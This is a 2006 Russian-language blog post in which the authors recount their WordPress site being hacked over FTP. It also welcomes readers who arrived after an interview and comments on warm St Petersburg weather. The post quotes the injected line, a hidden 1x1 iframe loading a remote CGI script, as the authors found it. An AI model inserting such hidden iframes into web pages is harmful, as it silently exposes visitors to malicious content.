Нас взломали. Приветствуем новеньких!

За прошедшие семь дней произошли два важных события для нашего блога:

1. 2 декабря 2006 Тугезу взломали
2. Несколькими днями позже, блог Toodoo взял у нас интервью (6.12.2006)

Вот она, бешеная популярность! :)

Что касается взлома
FTP логи показали, что 2 декабря в 11:03:54 некто с адреса 75.126.22.187 зашел в корневую папку сайта. Далее он загрузил к себе файлы index.php и wp-blog-header.php, изменил их и загрузил обратно. С индексом вроде ничего не сделал, а в конец wp-blog-header.php дописал строку:

iframe src='http://sun-5.org/in.cgi?default' width='1' height='1' style='visibility: hidden;

Зачем это было сделано я так и не понял. Сайт sun-5.org не существует и свободен для регистрации. И вообще, хак я не замечал до тех пор, пока 3 декабря у нас не появилась следующая заметка (мы стараемся писать в блог не реже 1 раза в 2 дня), которая всё никак не хотела появляться в rss-reader-ах. Валидатор указал на то, что фид недоступен, так как выдает ошибку:

line 1, symbol 105:
iframe src='http://sun-5.org/in.cgi?default' width='1' height='1' style='visibility: hidden;'>

Ну а потом я узнал всё, что описано выше.

Адрес 75.126.22.187 принадлежит хостинг провайдеру MIRhosting.com, которым я отправил письмо по адресу abuse@mirhosting.com с копией в support@valuehost.ru примерно следующего содержания:

«2 декабря 2006 года, мой сайт, находящийся на хостинге Valuehost.ru, был взломан (открыты по фтп несколько файлов, внесены изменения и загружены обратно). FTP логи указывают на то, что все эти операции были осуществлены с адреса 75.126.22.187 trace которого указывает на 75.126.22.187.infomart.reverse.mirhosting.com»

Далее я попросил паспортные данные взломщика, цвет глаз, волос ну и тому подобное. Мне довольно быстро ответили, что я уже не первый, кто обратился с жалобой на указанный айпи, и что юзер с «плохим айпи» был заблокирован 3 декабря. На просьбу выдать злодея, мне сказали, что это «один из клиентов нашего клиента, владеющего группой айпи адресов и мы понятия не имеем». Я не стал дальше вдаваться в подробности, спасибо и на том, что «приняли меры». Но какой-то подозрительный осадок у меня остался. ФТП пароль у нас был из 10-ти символов (подобрали? перехватили?), даже всем известный «взлом» Valuehost-овский базы и тот датирован сентябрём с.г.,(наш сайт появился в октябре), как хостинг-провайдер может блокировать по айпи? Разве это не обязанности интернет провайдера (isp)?

Друзья, что это могло быть? Есть специалисты? Ведь ничего не удалили (спасибо!) и просто вставили ссылку на несуществующий сайт… Странно.

В вопросах сетевой защиты мы тут полные чайники, так что хорошо, что всё обошлось! Из этой всей истории можно даже мораль вывести — Чаще Пишите В Свой Блог!

Что касается интервью
Ничто не может нам помешать поприветствовать всех новых посетителей, пришедших к нам после публикации интервью на Toodoo — привет всем, будем дружить!

Кроме того, мы рады здесь видеть всех пришедших к нам с различных семейно–ориентированных форумов! Здравствуйте!

А в остальном
В Питере установилась невероятно тёплая для декабря погода! На прошедшей неделе был зафиксировано +12, что является рекордом за последние 150 лет инструментального контроля. Такая же жо… погода не только в Европейской части России, но и в Дании и прочих Европах. Во всём виноват, говорят, Гольфстрим:

«Причина очень теплой погоды заключается в том, что в Атлантике, районе течения Гольфстрим вода на 1 — 2 градуса теплее, чем обычно в декабре. Именно там рождаются циклоны, несущие невероятно теплый воздух в Западную Европу и Россию».

Я даже решил сфотографировать декабрь в Петербурге. Вот несколько кадров: